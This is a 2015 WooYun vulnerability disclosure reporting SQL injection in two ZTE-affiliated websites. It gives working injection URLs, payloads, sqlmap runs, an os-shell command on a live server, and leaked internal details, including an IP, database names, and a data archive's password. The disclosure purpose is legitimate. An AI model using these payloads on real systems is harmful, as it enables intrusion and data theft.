当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155134

漏洞标题:中兴多个SQL注入打包提交(显错注入\DBA权限\150个数据库)

相关厂商:中兴通讯股份有限公司

漏洞作者: harbour_bin

提交时间:2015-11-23 10:14

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-23: 厂商已经确认,细节仅向厂商公开
2015-12-03: 细节向核心白帽子及相关领域专家公开
2015-12-13: 细节向普通白帽子公开
2015-12-23: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT

详细说明:

1、

http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35


显错注入

http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35%20and%201=@@version
版本:Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64) Jul 9 2008 14:17:44 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35%20and%201=user
用户名:sql_zfkj2014
http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35%20and%201=db_name()
数据库:zhongxingchangtian


SqlMap跑一下:

D:\Python>python sqlmap\sqlmap.py -u "http://www.zte-v.com.cn/Plus/SubForm.aspx?
FID=2&NodeID=35" --dbs --users --is-dba
[*] starting at 09:20:24
[09:20:24] [INFO] resuming back-end DBMS 'microsoft sql server'
[09:20:24] [INFO] testing connection to the target URL
[09:20:25] [WARNING] reflective value(s) found and filtering out
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: NodeID (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: FID=2&NodeID=35 AND 3907=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CH
AR(122)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3907=3907) THEN CHAR(49) ELSE CH
AR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(98)+CHAR(113)))
---
[09:20:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[09:20:25] [INFO] testing if current user is DBA
current user is DBA: False
[09:20:25] [INFO] fetching database users
[09:20:25] [INFO] the SQL query used returns 2 entries
[09:20:25] [INFO] resumed: sa
[09:20:25] [INFO] resumed: sql_zfkj2014
database management system users [2]:
[*] sa
[*] sql_zfkj2014
[09:20:25] [INFO] fetching database names
[09:20:25] [INFO] the SQL query used returns 129 entries
available databases [129]:
[*] aolanduo
[*] BDQN_cn
[*] chengjumeng
[*] chengkaijianzhu
[*] chengmingshi
[*] chengxiangyitihua
[*] cjt
[*] CJZFSql
[*] collage
[*] Curative
[*] daikuan
[*] daoerdun
[*] DFS_SALES_SYSTEM
[*] DFS_WLDDJS
[*] dfsahhygl
[*] dhlgclkx
[*] dishuiju
[*] donghualigonghuaxue
[*] dongshengzhongzhu
[*] DT_hr
[*] DT_sys
[*] dtle
[*] fenghuang
[*] FindDemo
[*] GuiHuaSheJi
[*] guozhiwjj
[*] haobang
[*] haohanguanwang
[*] helafushi
[*] hengzhilaowu
[*] hongrunhuagong
[*] huazhong
[*] HuaZhongJiaoTong
[*] hxtx580
[*] jiangxiluohekeji
[*] jiankangguoji
[*] jidianweiwang
[*] jingpinkecheng
[*] JingYinJiaoYu
[*] jinpaizhoupu
[*] jiuxinzhubao
[*] jiuzhongyuantaoci
[*] jxpufa
[*] jxsifa
[*] kangsheng
[*] kaoshi
[*] kehuanshiye
[*] kongtiao
[*] kongtiao7
[*] kunyuanduanxinpingtai
[*] kunyuanduanxinpingtai_1
[*] LC_MTF_DATA
[*] LEDa1
[*] LEDb
[*] lianjing
[*] liansi
[*] loushanglou
[*] lsfwq
[*] lvdu
[*] master
[*] MeiRongMeiFa
[*] message
[*] model
[*] msdb
[*] nanchangzongfuwuqu
[*] nchkyyxy
[*] ncjjzxw
[*] NongGongDang
[*] NPSMSPlatform
[*] OAManage
[*] poyangfuwuqu
[*] pushikeji
[*] qishishengwu
[*] Recovered_changjiangsike
[*] Recovered_lingsuyaoye
[*] ReportServer
[*] ReportServerTempDB
[*] shanggaotongxun
[*] shekewang
[*] shengnvzizhongzhuan
[*] shinianshijue
[*] shuguangjituan
[*] shuilishuidian
[*] shuilishuidianyw
[*] shuiwujituan
[*] shunshengjiangong
[*] smart
[*] StudentFrance
[*] taiguoborendx
[*] tempdb
[*] tfr245077
[*] Tour1
[*] Tour2
[*] UFDATA_001_2014
[*] UFDATA_001_2015
[*] UFDATA_002_2015
[*] UFDATA_800_2014
[*] UFDATA_800_2015
[*] UFData_998_2012
[*] UFData_999_2011
[*] UfNote_001_2015
[*] UfNoteSys
[*] UFSub
[*] UFSystem
[*] wanxiang
[*] weishengxinxi
[*] wit_oa
[*] wuliyf
[*] xifuhui
[*] xinxiwang
[*] XinXiWang2
[*] xlzxyzbg
[*] yangzixiang
[*] Yd
[*] Yd1
[*] ynk
[*] yuanrenshequ
[*] yuansuhunli
[*] yumingqiangzhu1
[*] zfkj_doc
[*] zfkj_oa
[*] zfkj_sys
[*] ZFKJ_ZHJJ
[*] zhengzhongtang
[*] zhongxingchangtian
[*] ZHYQ
[*] zmbg
[*] Zufeng_HuaKai
[*] 网站保姆


129个数据库
2、

http://www.ztehotel.com/mobile/mhotelgen.aspx?id=ZTE002


盲注

http://www.ztehotel.com/mobile/mhotelgen.aspx?id=ZTE002%27%20and%20len(user)=3%20and%201=1--
http://www.ztehotel.com/mobile/mhotelgen.aspx?id=ZTE002%27%20and%20len(db_name())=7%20and%201=1--


这个以前有人交过了, 没有修复,不是很重视啊

D:\Python>python sqlmap\sqlmap.py -u "http://www.ztehotel.com/mobile/mhotelgen.aspx?id=ZTE002" --dbs --users --is-dba
[*] starting at 17:28:08
[17:28:08] [INFO] resuming back-end DBMS 'microsoft sql server'
[17:28:08] [INFO] testing connection to the target URL
[17:28:10] [WARNING] reflective value(s) found and filtering out
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=ZTE002' AND 6106=6106 AND 'mUYy'='mUYy
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=ZTE002';WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=ZTE002' WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=-9839' UNION ALL SELECT NULL,CHAR(113)+CHAR(112)+CHAR(113)+CHAR(
122)+CHAR(113)+CHAR(113)+CHAR(82)+CHAR(82)+CHAR(112)+CHAR(70)+CHAR(69)+CHAR(67)+
CHAR(70)+CHAR(71)+CHAR(118)+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113),NU
LL,NULL,NULL--
---
[17:28:10] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[17:28:10] [INFO] testing if current user is DBA
current user is DBA: True
[17:28:10] [INFO] fetching database users
[17:28:10] [INFO] the SQL query used returns 5 entries
[17:28:10] [INFO] resumed: ADO
[17:28:10] [INFO] resumed: ATTENDANCE
[17:28:10] [INFO] resumed: saa
[17:28:10] [INFO] resumed: saa
[17:28:10] [INFO] resumed: zte
database management system users [4]:
[*] ADO
[*] ATTENDANCE
[*] saa
[*] zte
[17:28:10] [INFO] fetching database names
[17:28:10] [INFO] the SQL query used returns 22 entries
available databases [21]:
[*] DotNetCms
[*] hotelplan
[*] hr
[*] hrTest
[*] Lsmis_nanJing
[*] Lsmis_shangHai
[*] Lsmis_xiAn
[*] master
[*] model
[*] msdb
[*] MyPhoto
[*] New iCall
[*] OfficeAnywhere
[*] Repertory
[*] ReportServer
[*] ReportServerTempDB
[*] SMS_Mail
[*] SSMISDIYDB
[*] tempdb
[*] TYCRM
[*] XL_Attendance


DBA权限

os-shell> ipconfig
command standard output:
---
Windows IP Configuration
Ethernet adapter 本地连接 4:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.66.1.188
Subnet Mask . . . . . . . . . . . : 255.255.192.0
Default Gateway . . . . . . . . . : 10.66.1.3
---


网站目录, 应该可以shell的, 不慢慢找了

command standard output:
---
驱动器 G 中的卷没有标签。
卷的序列号是 6858-E60F
g:\ 的目录
2015-03-28 10:07 <DIR> 360Downloads
2013-10-10 08:53 <DIR> arswp3
2011-12-07 16:48 <DIR> DJKeygoe
2013-06-08 18:09 <DIR> DotNetCms
2013-09-22 04:26 4,645,268 DotNetCms.rar
2014-08-14 08:12 <DIR> DVSDAT
2015-03-18 09:10 <DIR> faduanxin
2013-09-22 04:26 412,188 faduanxin.rar
2013-01-17 17:10 <DIR> hotelplan
2013-09-22 04:21 3,764,416 hotelplan.rar
2011-08-02 15:56 <DIR> iCall Setup
2013-05-07 11:29 7,358 logo.ico
2013-03-13 15:56 <DIR> nanJing
2014-12-05 09:29 1,258,179 nanJing20141205.rar
2014-08-11 10:16 <DIR> OANetdisk
2012-06-01 16:55 <DIR> Office2007 Professional_简体中文专业版_微软
最新的office系列
2013-10-15 12:37 <DIR> OfficeAnywhere
2013-09-06 14:19 <DIR> OfficeAnywhere 开发用
2013-06-14 11:14 <DIR> OfficeAnywhere2013-6-14
2013-12-12 14:52 2,668,474,968 OfficeAnywhere2013年12月12日143818.rar
2014-12-05 09:42 2,697,482,797 OfficeAnywhere20141205.rar
2013-05-17 11:21 <DIR> OfficeAnywhere5-17
2013-05-21 19:04 <DIR> OfficeAnywhere考勤修改
2013-03-21 10:21 <DIR> pos基础环境
2014-01-22 18:44 <DIR> Program Files
2013-10-10 08:53 <DIR> rsc3
2013-05-17 11:33 <DIR> shangHai
2014-12-05 09:29 1,434,263 shangHai20141205.rar
2013-09-10 10:09 38,435,064 sogou_explorer_4.1_0826.exe
2012-08-08 14:44 <DIR> SSSoft
2013-05-07 11:51 390,704,410 SW_CD_Visio_Pro_2007.7z
2013-09-13 14:34 <DIR> sybase_dll
2013-09-13 14:32 221,923 sybase_dll.rar
2013-03-21 17:02 <DIR> WebSendMsg
2013-09-21 20:58 <DIR> WebSite
2014-12-05 09:28 1,433,418 WebSite20141205.rar
2013-04-18 08:42 <DIR> WebSite8
2015-01-05 11:00 <DIR> WindowsApplication1
2013-09-22 02:27 1,512,925 WindowsApplication1.rar
2013-05-31 15:17 <DIR> xiAn
2014-12-05 09:29 1,434,958 xiAn20141205.rar
2013-04-16 11:12 <DIR> youxiangdizhi
2013-04-16 11:15 294,752,939 youxiangdizhi.rar
2013-06-19 18:44 1,240,469,589 youxiangdizhi2013年6月19日183847.rar
2015-03-18 19:44 <DIR> ztehoteloa
2013-09-22 04:26 1,238,502 ztehoteloa.rar
2013-10-22 10:28 <DIR> [fuliba.net]某酒店2000W数据(解压密码:sjisau
isa是就数据8很舒适好sjjss)(20131021234529)
2013-10-22 09:47 1,834,815,332 [fuliba.net]某酒店2000W数据(解压密码:sjisau
isa是就数据8很舒适好sjjss)(20131021234529).rar
2013-05-31 15:44 <DIR> 仓库系统2013年5月31日修改前
2013-03-05 21:17 <DIR> 和泰报表勿动
2013-04-08 08:48 159,350 和泰报表勿动.rar
2013-08-05 11:57 2,556 在指定位置添加点对象.htm
2013-08-05 11:57 <DIR> 在指定位置添加点对象_files
2014-11-18 10:32 <DIR> 官网
2013-10-10 08:53 <DIR> 恶意软件清理助手 v2.82
2013-02-18 08:49 12,741 截图00.jpg
---

漏洞证明:

http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35


1.png


2.png


3.png


http://www.ztehotel.com/mobile/mhotelgen.aspx?id=ZTE002


4.png


PS:具体数据不跑了, 危害还是比较大的; 如果危害不够, 可以补充

修复方案:

过滤

版权声明:转载请注明来源 harbour_bin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-23 14:31

厂商回复:

感谢提交~

最新状态:

暂无